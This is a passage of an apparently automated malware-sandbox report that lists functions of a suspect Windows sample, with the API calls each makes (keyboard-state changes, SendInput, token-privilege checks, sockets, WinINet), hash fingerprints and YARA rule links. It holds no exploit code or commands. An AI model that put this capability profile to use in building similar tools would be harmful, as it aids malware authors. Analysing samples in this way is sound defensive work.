API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 9aa110c7c29b32d6b3b947ce478c6f5ed03fb9767d9eea7ab49fa550d0fe403b
Instruction ID: e0a649774496ae563449df09091a2ac1dd85c83a44c78598cbc84986764528f2
Opcode Fuzzy Hash: 9aa110c7c29b32d6b3b947ce478c6f5ed03fb9767d9eea7ab49fa550d0fe403b
Instruction Fuzzy Hash: 2C51C2747003029ADF64AF65D891A6AB3E7AF44311F60D81FF996DB392DB30D849CB14

Function 006897F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0142DCF0,?), ref: 00689863
ScreenToClient.USER32(00000002,00000002), ref: 00689896
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00689903

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 5270a7ba35c1fb1b156d121d13ef069e3a151c10af665ca6df9c4f11acbc5802
Instruction ID: 06e5b21092d0d26af6e3f737111dd6e29e8e7816dd618c34593d1918f57f06a1
Opcode Fuzzy Hash: 5270a7ba35c1fb1b156d121d13ef069e3a151c10af665ca6df9c4f11acbc5802
Instruction Fuzzy Hash: 1D512C74A00209AFCF14DF54C884ABE7BB6FF55360F188659F9659B3A0D731AD81CBA0

Function 00659A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00659AD2
__itow.LIBCMT ref: 00659B03

Part of subcall function 00659D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00659DBE

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00659B6C
__itow.LIBCMT ref: 00659BC3

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 457d3697dd4cacef5eea307f82d4b6601e95c1565a03894fa8b0cd1c2f5ed8db
Instruction ID: adc879716690025d6631033fcc094aa624f7116f17d1d84be96002dd518eed0b
Opcode Fuzzy Hash: 457d3697dd4cacef5eea307f82d4b6601e95c1565a03894fa8b0cd1c2f5ed8db
Instruction Fuzzy Hash: E941AE70A40208ABEF15EF54D845BEF7BBAEF44715F000069FD05A3291DB70AE48CBA5

Function 006769AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 006769D1
WSAGetLastError.WSOCK32(00000000), ref: 006769E1

Part of subcall function 00609837: __itow.LIBCMT ref: 00609862
Part of subcall function 00609837: __swprintf.LIBCMT ref: 006098AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00676A45
WSAGetLastError.WSOCK32(00000000), ref: 00676A51

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 5ecaf137b2f5bfe5bc5b8a2628c9ca8cbffc0e1ea5bdaece06cc122dd17ae489
Instruction ID: 9db14234506f73e6ea38597f544a43e63bd4ca8643808edcb63c90b34c74df8c
Opcode Fuzzy Hash: 5ecaf137b2f5bfe5bc5b8a2628c9ca8cbffc0e1ea5bdaece06cc122dd17ae489
Instruction Fuzzy Hash: D241A275780600AFEBA4AF24CC86F6A77A69F44B14F04C55CFA59AB3C3DA709D008B95

Function 0067641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0068F910), ref: 006764A7
_strlen.LIBCMT ref: 006764D9

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 11cdaea621bf16d6d0c527b139693c667ec4b38bf2306ffa9b2ad0173c59bb16
Instruction ID: b09b65fb586dec94f8863ab7bb614694c64a85cafa9b2c04b69b0e6a717513ce
Opcode Fuzzy Hash: 11cdaea621bf16d6d0c527b139693c667ec4b38bf2306ffa9b2ad0173c59bb16
Instruction Fuzzy Hash: 7C41A271600504ABDB58EBA8EC85EAFB7ABAF04310F14C159F91A972D3EB30AD44CB54

Function 0066B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0066B89E
GetLastError.KERNEL32(?,00000000), ref: 0066B8C4
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0066B8E9
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0066B915

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 719b9c55ff4be241197d497091a3b3d3598827f43eb5e5fa65e09f6660e53571
Instruction ID: 2e779b94a724adada98871e30b4fbde3078c06228609cf9c97d6e8fccc9a2137
Opcode Fuzzy Hash: 719b9c55ff4be241197d497091a3b3d3598827f43eb5e5fa65e09f6660e53571
Instruction Fuzzy Hash: DB411A35600510DFCB55EF25C484A5ABBE3AF4A310F09C498EC4AAB3A2CB30FD41CBA5

Function 00688851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006888DE

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: d213fd217287f8782743ee65bd136799504ecb46a192edc36c8fc497da4f7ab6
Instruction ID: 0b1f4f10c9e79ca9cb8cd71ddd40874ca7c1a5cb017a12ac7be82d5d1b1a639c
Opcode Fuzzy Hash: d213fd217287f8782743ee65bd136799504ecb46a192edc36c8fc497da4f7ab6
Instruction Fuzzy Hash: B3318E74640109BEEF24BB58CC45BF977A7EB09310FD44316FA15E72A1CA70A9809796

Function 0068AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0068AB60
GetWindowRect.USER32(?,?), ref: 0068ABD6
PtInRect.USER32(?,?,0068C014), ref: 0068ABE6
MessageBeep.USER32(00000000), ref: 0068AC57

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 7e6b0ccea57fd8e5d7a3cc67f85beb6acda07d7c087c45fd55a91809a12ad4e3
Instruction ID: dff229039a271e27ec8ce69baf1e53426d6a1449cb78615f64969089ea20779b
Opcode Fuzzy Hash: 7e6b0ccea57fd8e5d7a3cc67f85beb6acda07d7c087c45fd55a91809a12ad4e3
Instruction Fuzzy Hash: 62416E30600519DFEB11EF98D884BA97BF7FF49310F1892AAE9159B361D730E841CB92

Function 00660AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00660B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 00660B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00660BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00660BFB

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: d75725ce2a0c10c29bd626e61c38c4671b834188b7ca5178ae6fc361053763b7
Instruction ID: 790166c867922ffc368f0db28965412584c25028818b0cd1fac75fcc2b1aebd7
Opcode Fuzzy Hash: d75725ce2a0c10c29bd626e61c38c4671b834188b7ca5178ae6fc361053763b7
Instruction Fuzzy Hash: FD314870940208AEFB308B29CC05BFBBBABEB55319F18837AE481522D1C7B68D859755

Function 00660C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 00660C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 00660C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 00660CE1
SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 00660D33

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 9d414fd8b52ac999f3f009f6083668bb01566a12df1e395b7df7d939fe222983
Instruction ID: d08df5a714c1646b420ab6d3d30345a6b7b8d4d82118e63e66e2500706d70f98
Opcode Fuzzy Hash: 9d414fd8b52ac999f3f009f6083668bb01566a12df1e395b7df7d939fe222983
Instruction Fuzzy Hash: 263135309402486EFF348B648805BFFBB67EF49310F04433AE481522D1C3759D45C796

Function 006361C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 006361FB
__isleadbyte_l.LIBCMT ref: 00636229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00636257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0063628D

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 2b5bf60b27f7ce122eb42238db54e07f3e45c8d62758361090037af689159c3c
Instruction ID: da4b1319bb27a40ace3eab1b1c55a0309c40f03b5c12237babdd9a56d975d5ef
Opcode Fuzzy Hash: 2b5bf60b27f7ce122eb42238db54e07f3e45c8d62758361090037af689159c3c
Instruction Fuzzy Hash: 1731C030604256BFDF218F65CC48BAB7BBAFF42310F168128F86497291DB31DA50DB90

Function 00684EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00684F02

Part of subcall function 00663641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0066365B
Part of subcall function 00663641: GetCurrentThreadId.KERNEL32 ref: 00663662
Part of subcall function 00663641: AttachThreadInput.USER32(00000000,?,00665005), ref: 00663669

GetCaretPos.USER32(?), ref: 00684F13
ClientToScreen.USER32(00000000,?), ref: 00684F4E
GetForegroundWindow.USER32 ref: 00684F54

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 4a1d14332988943ad05474fe470394212723d64b182553490ea2cead552e45ef
Instruction ID: 6b6e0c40eeab9f3a1867b55fe8542fda40d9fff6be3d9d22869567df0a1375ea
Opcode Fuzzy Hash: 4a1d14332988943ad05474fe470394212723d64b182553490ea2cead552e45ef
Instruction Fuzzy Hash: BB313EB1D00108AFDB44EFB5C8859EFB7FAEF98300F10456AE415E7242EA719E05CBA5

Function 0068C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623

GetCursorPos.USER32(?), ref: 0068C4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0063B9AB,?,?,?,?,?), ref: 0068C4E7
GetCursorPos.USER32(?), ref: 0068C534
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0063B9AB,?,?,?), ref: 0068C56E

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 1661b6153b95190befa29078a0cd3f1573fbd0d9b2f3358f859b5998ca2a92ea
Instruction ID: efa7b635cd7383fa2312f08ccd264a246ea7b151e86334ab5aee866d8f7c79df
Opcode Fuzzy Hash: 1661b6153b95190befa29078a0cd3f1573fbd0d9b2f3358f859b5998ca2a92ea
Instruction Fuzzy Hash: E7316D35600058BFCF259F58CC58EFA7BB7EB09320F444269F9058B361C731A9A1DBA5

Function 00658656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0065810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00658121
Part of subcall function 0065810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0065812B
Part of subcall function 0065810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0065813A
Part of subcall function 0065810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00658141
Part of subcall function 0065810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00658157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 006586A3
_memcmp.LIBCMT ref: 006586C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 006586FC
HeapFree.KERNEL32(00000000), ref: 00658703

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 4bad78c3a320d2a3f7edcb537df89e66e871cc51504fbad040f387bcd4e6e351
Instruction ID: 353b64c0adc7bdebe63ea424e990f26947d4e4f9eb220c323954e1e3f133e256
Opcode Fuzzy Hash: 4bad78c3a320d2a3f7edcb537df89e66e871cc51504fbad040f387bcd4e6e351
Instruction Fuzzy Hash: 6921AF71E01109EFDB10DFA4C989BEEB7BAEF54306F154099E844BB240DB31AE09CB90

Function 0062098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 006209AE

Part of subcall function 00605A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00667896,?,?,00000000), ref: 00605A2C
Part of subcall function 00605A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00667896,?,?,00000000,?,?), ref: 00605A50

_fprintf.LIBCMT ref: 006209E5
OutputDebugStringW.KERNEL32(?), ref: 00655DBB

Part of subcall function 00624AAA: _flsall.LIBCMT ref: 00624AC3

__setmode.LIBCMT ref: 00620A1A

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 4c961302bf278eee794b021b58b73903216234d200eead22746d0b92e7861581
Instruction ID: 576dadf28afcac9ec831471656b69ef55d8d77ae2bbeebae2945dde8aba07c6d
Opcode Fuzzy Hash: 4c961302bf278eee794b021b58b73903216234d200eead22746d0b92e7861581
Instruction Fuzzy Hash: 8A115732A44A146FDB44B7B4BC869FEB7AB9F41320F20011DF106672C3EE2049464BA9

Function 00671767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006717A3

Part of subcall function 0067182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0067184C
Part of subcall function 0067182D: InternetCloseHandle.WININET(00000000), ref: 006718E9

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 20f7e5c3e121f1a115fe238232da3e8ce3f9f872d29ac5bba8d0391fea804544
Instruction ID: bfcca8c59c26b77ef92801c786b190222128a639cadc2d904ab9137d1c154f55
Opcode Fuzzy Hash: 20f7e5c3e121f1a115fe238232da3e8ce3f9f872d29ac5bba8d0391fea804544
Instruction Fuzzy Hash: 6821A431200605BFEB169F64DC01FBABBEBFF49710F10812EF9199A650D771D811A7A5

Function 00663A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0068FAC0), ref: 00663A64
GetLastError.KERNEL32 ref: 00663A73
CreateDirectoryW.KERNEL32(?,00000000), ref: 00663A82
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0068FAC0), ref: 00663ADF

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 42f8a8c8154a3cc360a363917041519877125f9aba546a7af4f2359647cc2263
Instruction ID: 3343d64a4f1c7acaa266b85047eb6a97c51978f655a2c47cd21ee1a09b6aa0e6
Opcode Fuzzy Hash: 42f8a8c8154a3cc360a363917041519877125f9aba546a7af4f2359647cc2263
Instruction Fuzzy Hash: CE21B1305082119FC300EF68C8818ABB7E6AE59364F144A2DF499C73E1D7319E06DB82

Function 006350E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00635101

Part of subcall function 0062571C: __FF_MSGBANNER.LIBCMT ref: 00625733
Part of subcall function 0062571C: __NMSG_WRITE.LIBCMT ref: 0062573A
Part of subcall function 0062571C: RtlAllocateHeap.NTDLL(01410000,00000000,00000001,00000000,?,?,?,00620DD3,?), ref: 0062575F

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: cd1fc48e7c43dd66f166d75eaf1e9fea2f5bef764afa39a955f6bcd7b5b06759
Instruction ID: 5c4641c4dcc8190cc3409e64d61d5777e012f1b7c039626c76b49427922cd3b1
Opcode Fuzzy Hash: cd1fc48e7c43dd66f166d75eaf1e9fea2f5bef764afa39a955f6bcd7b5b06759
Instruction Fuzzy Hash: 42119E72901E25AFCF712F74BC45BAE379B9B143A2F10492EF9069B250DE3489419BD8

